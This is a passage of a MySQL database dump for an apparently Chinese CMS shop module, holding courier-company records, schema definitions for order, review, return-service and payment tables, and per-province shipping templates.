INSERT INTO `ey_shop_express` VALUES ('560', 'zengyisudi', '增益速递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('561', 'sujievip', '郑州速捷', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('562', 'ztong', '智通物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('563', 'zhichengtongda', '至诚通达快递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('564', 'zhdwl', '众辉达物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('565', 'kuachangwuliu', '直邮易', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('566', 'topspeedex', '中运全速', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('567', 'otobv', '中欧快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('568', 'zsky123', '准实快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('569', 'cnws', '中国翼', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('570', 'zytdscm', '中宇天地', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('571', 'zhuanyunsifang', '转运四方', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('572', 'hrbzykd', '卓烨快递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('573', 'zhuoshikuaiyun', '卓实快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('574', 'chinaicip', '卓志速运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('575', 'ynztsy', '纵通速运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('576', 'zdepost', '直德邮', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('577', 'chinapostcb', '中邮电商', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('578', 'chunghwa56', '中骅物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('579', 'cosco', '中远e环球', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('580', 'zf365', '珠峰速运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('581', 'zhongtongkuaiyun', '中通快运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('582', 'eucnrail', '中欧国际物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('583', 'chnexp', '中翼国际物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('584', 'cccc58', '中集冷云', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('585', 'auvanda', '中联速递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('586', 'zyzoom', '增速跨境', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('587', 'zhpex', '众派速递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('588', 'byht', '展勤快递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('589', 'zhongchuan', '众川国际', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('590', 'zhonghuanus', '中环转运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('591', 'zhonghuan', '中环快递', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('592', 'uszcn', '转运中国', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('593', 'zhitengwuliu', '志腾物流', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('594', 'zsda56', '转瞬达集运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('595', 'zjgj56', '振捷国际货运', 'Z', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('596', 'jtexpress', '极兔速递', 'J', '1', '100', '1553911076', '1553911076');
INSERT INTO `ey_shop_express` VALUES ('598', 'fengwang', '丰网速运', 'F', '1', '100', '1553911076', '1647484768');
-- -----------------------------
-- Table structure for `ey_shop_order`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order`;
CREATE TABLE `ey_shop_order` (
`order_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '订单id',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '订单编号',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员id',
`merchant_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '多商家ID',
`order_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '订单状态:0未付款(已下单),1已付款(待发货),2已发货(待收货),3已完成(确认收货),-1订单取消(已关闭),4订单过期',
`payment_method` tinyint(1) DEFAULT '0' COMMENT '订单支付方式,0为在线支付,1为货到付款,默认0',
`pay_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '支付时间',
`pay_name` varchar(20) NOT NULL DEFAULT '' COMMENT '支付方式名称',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`order_terminal` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '订单终端(1=电脑端、2=手机端、3微信小程序)',
`contains_virtual` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '订单是否包含虚拟商品(1=不包含、2=包含)',
`manual_refund` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '订单是否被手动关闭并退款',
`refund_note` varchar(500) NOT NULL DEFAULT '' COMMENT '订单手动退款原因',
`pay_details` text COMMENT '支付时返回的数据,以serialize序列化后存入,用于后续查询。',
`express_order` varchar(50) DEFAULT '' COMMENT '发货物流单号',
`express_name` varchar(32) DEFAULT '' COMMENT '发货物流名称',
`express_code` varchar(32) DEFAULT '' COMMENT '发货物流code',
`express_time` int(11) DEFAULT '0' COMMENT '发货时间',
`consignee` varchar(30) NOT NULL DEFAULT '' COMMENT '收货人',
`confirm_time` int(11) DEFAULT '0' COMMENT '收货确认时间',
`allow_service` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '订单是否允许申请售后维权,0=允许申请维权,1=不允许申请维权',
`obtain_scores` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '消费获得积分数',
`is_obtain_scores` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '该订单是否已赠送积分,0=未赠送,1=已赠送',
`shipping_fee` decimal(10,2) DEFAULT '0.00' COMMENT '订单运费',
`order_total_amount` decimal(10,2) DEFAULT '0.00' COMMENT '订单总价',
`order_amount` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '应付款金额',
`order_total_num` int(10) DEFAULT '0' COMMENT '订单总数',
`country` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '国家',
`province` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '省份',
`city` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '城市',
`district` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '县区',
`address` varchar(500) NOT NULL DEFAULT '' COMMENT '收货地址',
`mobile` varchar(20) DEFAULT '' COMMENT '手机',
`prom_type` tinyint(1) unsigned DEFAULT '0' COMMENT '订单类型:0普通订单,1虚拟订单,2-核销订单(单次)',
`virtual_delivery` text COMMENT '虚拟订单时,卖家发货给买家的回复',
`admin_note` text COMMENT '管理员操作备注',
`is_comment` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否已评论,0为否,1为是,默认0',
`user_note` text COMMENT '会员备注',
`group` varchar(50) DEFAULT '' COMMENT '订单分组',
`order_md5` varchar(50) DEFAULT '' COMMENT '订单标识串,删除未付款的重复订单',
`order_source` tinyint(3) DEFAULT '10' COMMENT '10-普通订单 20-秒杀订单',
`order_source_id` int(10) DEFAULT '0' COMMENT '来源id(秒杀订单:active_time_id)',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
`coupon_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '优惠券数据表ID',
`use_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员的优惠券数据表ID',
`coupon_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '使用的优惠券金额',
PRIMARY KEY (`order_id`),
UNIQUE KEY `order_code` (`order_code`),
KEY `users_id` (`users_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单主表';
-- -----------------------------
-- Table structure for `ey_shop_order_comment`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_comment`;
CREATE TABLE `ey_shop_order_comment` (
`comment_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`order_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单ID',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '订单编号',
`details_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单明细表ID',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '商品ID',
`total_score` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '总评分,1:好评,2中评,3差评',
`content` varchar(1000) NOT NULL DEFAULT '' COMMENT '评论内容',
`upload_img` varchar(3000) NOT NULL DEFAULT '' COMMENT '晒单图片',
`admin_reply` varchar(1000) NOT NULL DEFAULT '' COMMENT '管理员回复',
`ip_address` varchar(15) NOT NULL DEFAULT '' COMMENT 'IP地址',
`is_show` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '是否显示:0否,1是',
`is_anonymous` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否匿名评价:0否,1是',
`is_new_comment` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否新版评价:0否,1是',
`lang` varchar(30) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`comment_id`),
KEY `users_id` (`users_id`),
KEY `order_id` (`order_id`),
KEY `details_id` (`details_id`),
KEY `product_id` (`product_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='商品评价表';
-- -----------------------------
-- Table structure for `ey_shop_order_details`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_details`;
CREATE TABLE `ey_shop_order_details` (
`details_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增id',
`order_id` int(10) NOT NULL DEFAULT '0' COMMENT '订单ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员id',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '产品id',
`product_name` varchar(100) NOT NULL DEFAULT '' COMMENT '产品名称',
`num` int(10) NOT NULL DEFAULT '0' COMMENT '单个产品数量',
`data` text COMMENT '序列化额外数据',
`product_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '产品单价',
`prom_type` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '产品类型:0普通产品,1虚拟产品',
`litpic` varchar(500) NOT NULL DEFAULT '' COMMENT '封面图片',
`apply_service` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否申请退换货服务:0 未申请、1已申请',
`is_comment` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否已评论,0为否,1为是,默认0',
`lang` varchar(30) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`details_id`),
KEY `users_id` (`users_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单详情表';
-- -----------------------------
-- Table structure for `ey_shop_order_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_log`;
CREATE TABLE `ey_shop_order_log` (
`action_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增id',
`order_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`action_user` int(10) DEFAULT '0' COMMENT '操作人;0:用户操作;1以上:管理员id',
`order_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '订单状态,单条记录状态',
`express_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '物流状态,0:未发货,1:已发货',
`pay_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '支付状态,0:未支付,1:已支付',
`action_desc` varchar(255) DEFAULT '' COMMENT '状态描述',
`action_note` varchar(255) NOT NULL DEFAULT '' COMMENT '操作备注',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '操作时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '操作时间',
PRIMARY KEY (`action_id`),
KEY `order_id` (`order_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单操作记录表';
-- -----------------------------
-- Table structure for `ey_shop_order_service`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_service`;
CREATE TABLE `ey_shop_order_service` (
`service_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`service_type` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '类型:1换货,2退货,3维修',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员id',
`merchant_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '多商家ID',
`order_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单ID',
`order_code` varchar(50) NOT NULL DEFAULT '' COMMENT '订单编号',
`details_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单明细表ID',
`product_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '产品ID',
`product_name` varchar(200) NOT NULL DEFAULT '' COMMENT '产品名称',
`product_spec` varchar(200) NOT NULL DEFAULT '' COMMENT '产品规格',
`product_num` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '产品数量',
`product_img` varchar(500) NOT NULL DEFAULT '' COMMENT '产品图片',
`content` varchar(500) NOT NULL DEFAULT '' COMMENT '退换货描述',
`upload_img` varchar(3000) NOT NULL DEFAULT '' COMMENT '上传的图片',
`address` varchar(500) NOT NULL DEFAULT '' COMMENT '退货的收货地址',
`consignee` varchar(30) NOT NULL DEFAULT '' COMMENT '收货人',
`mobile` varchar(20) NOT NULL DEFAULT '' COMMENT '手机',
`manual_refund` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '服务单是否被手动关闭并退款',
`refund_note` varchar(500) NOT NULL DEFAULT '' COMMENT '服务单手动退款原因',
`refund_price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '退还金额',
`refund_balance` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '退还余额',
`refund_code` varchar(40) NOT NULL DEFAULT '' COMMENT '退款单号',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态:1审核中 2审核通过 3审核不通过 4已发货 5已收货 6换货完成 7退款完成 8服务取消',
`users_delivery` varchar(500) NOT NULL DEFAULT '' COMMENT '会员发货信息',
`admin_delivery` varchar(500) NOT NULL DEFAULT '' COMMENT '管理员发货信息',
`admin_note` varchar(1000) NOT NULL DEFAULT '' COMMENT '管理员操作备注',
`lang` varchar(30) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '申请时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`service_id`),
KEY `users_id` (`users_id`) USING BTREE,
KEY `order_id` (`order_id`) USING BTREE,
KEY `order_code` (`order_code`) USING BTREE,
KEY `product_id` (`product_id`) USING BTREE,
KEY `details_id` (`details_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单退换货服务表';
-- -----------------------------
-- Table structure for `ey_shop_order_service_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_service_log`;
CREATE TABLE `ey_shop_order_service_log` (
`log_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`service_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '服务表ID',
`order_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '订单ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`admin_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '管理员ID',
`log_note` varchar(500) NOT NULL DEFAULT '' COMMENT '记录备注',
`lang` varchar(30) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '操作时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '操作时间',
PRIMARY KEY (`log_id`),
KEY `service_id` (`service_id`) USING BTREE,
KEY `order_id` (`order_id`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE,
KEY `admin_id` (`admin_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单退换货服务记录表';
-- -----------------------------
-- Table structure for `ey_shop_order_unified_pay`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_unified_pay`;
CREATE TABLE `ey_shop_order_unified_pay` (
`unified_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '统一支付订单ID',
`unified_number` varchar(30) NOT NULL DEFAULT '' COMMENT '统一支付订单编号',
`unified_amount` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '统一支付订单应付款金额',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`order_ids` text NOT NULL COMMENT '合并支付的订单ID,serialize序列化存储',
`pay_status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '统一支付订单状态:0未付款,1已付款',
`pay_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '统一支付订单时间',
`pay_name` varchar(20) NOT NULL DEFAULT '' COMMENT '统一支付订单方式名称',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`add_time` int(11) unsigned DEFAULT '0' COMMENT '下单时间',
`update_time` int(11) unsigned DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`unified_id`),
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
-- -----------------------------
-- Table structure for `ey_shop_order_verify`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_order_verify`;
CREATE TABLE `ey_shop_order_verify` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '订单核销信息表',
`users_id` int(11) DEFAULT '0' COMMENT '用户id',
`order_id` int(11) DEFAULT '0' COMMENT '订单id',
`points_id` int(11) DEFAULT '0' COMMENT '提货点id',
`verify_code` varchar(30) DEFAULT '' COMMENT '核销码',
`status` tinyint(3) DEFAULT '1' COMMENT '核销状态 1-未核销 2-已核销',
`add_time` int(10) DEFAULT '0',
`update_time` int(10) DEFAULT NULL,
`name` varchar(55) DEFAULT '' COMMENT '用户姓名',
`mobile` varchar(25) DEFAULT '' COMMENT '联系方式',
`verifier_id` int(11) DEFAULT '0' COMMENT '前台核销-核销员id',
`admin_id` int(11) DEFAULT '0' COMMENT '后台核销-管理员id',
`verify_time` int(10) DEFAULT '0' COMMENT '核销时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='订单核销表';
-- -----------------------------
-- Table structure for `ey_shop_product_attr`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_product_attr`;
CREATE TABLE `ey_shop_product_attr` (
`product_attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '产品属性id自增',
`aid` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '产品id',
`attr_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '属性id',
`attr_value` text NOT NULL COMMENT '属性值',
`attr_price` varchar(255) DEFAULT '' COMMENT '属性价格',
`is_custom` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否自定义参数(0否 1是)',
`sort_order` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '属性排序',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`product_attr_id`),
KEY `aid` (`aid`) USING BTREE,
KEY `attr_id` (`attr_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_shop_product_attribute`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_product_attribute`;
CREATE TABLE `ey_shop_product_attribute` (
`attr_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '属性id',
`attr_name` varchar(60) NOT NULL DEFAULT '' COMMENT '属性名称',
`list_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '栏目id',
`attr_index` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '0不需要检索 1关键字检索 2范围检索',
`attr_input_type` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT ' 0=文本框,1=下拉框,2=多行文本框',
`attr_values` text NOT NULL COMMENT '可选值列表',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态(0=禁用,1=启用)',
`sort_order` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '属性排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`is_del` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否已删除,0=否,1=是',
`is_custom` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否自定义参数(0否 1是)',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`attr_id`),
KEY `cat_id` (`list_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_shop_product_attrlist`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_product_attrlist`;
CREATE TABLE `ey_shop_product_attrlist` (
`list_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '列表id',
`list_name` varchar(60) NOT NULL DEFAULT '' COMMENT '列表名称',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态(0=禁用,1=启用)',
`attr_count` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '参数数量',
`desc` text NOT NULL COMMENT '描述备注',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否已删除,0=否,1=是',
`sort_order` int(11) unsigned NOT NULL DEFAULT '100' COMMENT '列表排序',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`list_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_shop_shipping_template`
-- -----------------------------
DROP TABLE IF EXISTS `ey_shop_shipping_template`;
CREATE TABLE `ey_shop_shipping_template` (
`template_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '运费模板ID',
`template_region` varchar(255) NOT NULL DEFAULT '' COMMENT '模板运送区域',
`template_money` decimal(10,2) unsigned NOT NULL DEFAULT '0.00' COMMENT '模板运费',
`province_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'region表id',
`lang` varchar(30) DEFAULT 'cn' COMMENT '语言标识',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`template_id`)
) ENGINE=MyISAM AUTO_INCREMENT=36 DEFAULT CHARSET=utf8 COMMENT='运费模板表';
-- -----------------------------
-- Records of `ey_shop_shipping_template`
-- -----------------------------
INSERT INTO `ey_shop_shipping_template` VALUES ('1', '北京市', '0.00', '1', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('2', '天津市', '0.00', '338', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('3', '河北省', '0.00', '636', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('4', '山西省', '0.00', '3102', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('5', '内蒙古自治区', '0.00', '4670', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('6', '辽宁省', '0.00', '5827', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('7', '吉林省', '0.00', '7531', 'cn', '1554775921');
INSERT INTO `ey_shop_shipping_template` VALUES ('8', '黑龙江省', '0.00', '8558', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('9', '上海市', '0.00', '10543', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('10', '江苏省', '0.00', '10808', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('11', '浙江省', '0.00', '12596', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('12', '安徽省', '0.00', '14234', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('13', '福建省', '0.00', '16068', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('14', '江西省', '0.00', '17359', 'cn', '1554775962');
INSERT INTO `ey_shop_shipping_template` VALUES ('15', '山东省', '0.00', '19280', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('16', '河南省', '0.00', '21387', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('17', '湖北省', '0.00', '24022', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('18', '湖南省', '0.00', '25579', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('19', '广东省', '0.00', '28240', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('20', '广西壮族自治区', '0.00', '30164', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('21', '海南省', '0.00', '31563', 'cn', '1555483193');
INSERT INTO `ey_shop_shipping_template` VALUES ('22', '重庆市', '0.00', '31929', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('23', '四川省', '0.00', '33007', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('24', '贵州省', '0.00', '37906', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('25', '云南省', '0.00', '39556', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('26', '西藏自治区', '0.00', '41103', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('27', '陕西省', '0.00', '41877', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('28', '甘肃省', '0.00', '43776', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('29', '青海省', '0.00', '45286', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('30', '宁夏回族自治区', '0.00', '45753', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('31', '新疆维吾尔自治区', '0.00', '46047', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('32', '台湾省', '0.00', '47493', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('33', '香港特别行政区', '0.00', '47494', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('34', '澳门特别行政区', '0.00', '47495', 'cn', '1554775610');
INSERT INTO `ey_shop_shipping_template` VALUES ('35', '统一配送价格', '0.00', '100000', 'cn', '1556618311');
-- -----------------------------
-- Table structure for `ey_single_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_single_content`;
CREATE TABLE `ey_single_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`typeid` int(10) DEFAULT '0' COMMENT '栏目ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_single_content`
-- -----------------------------
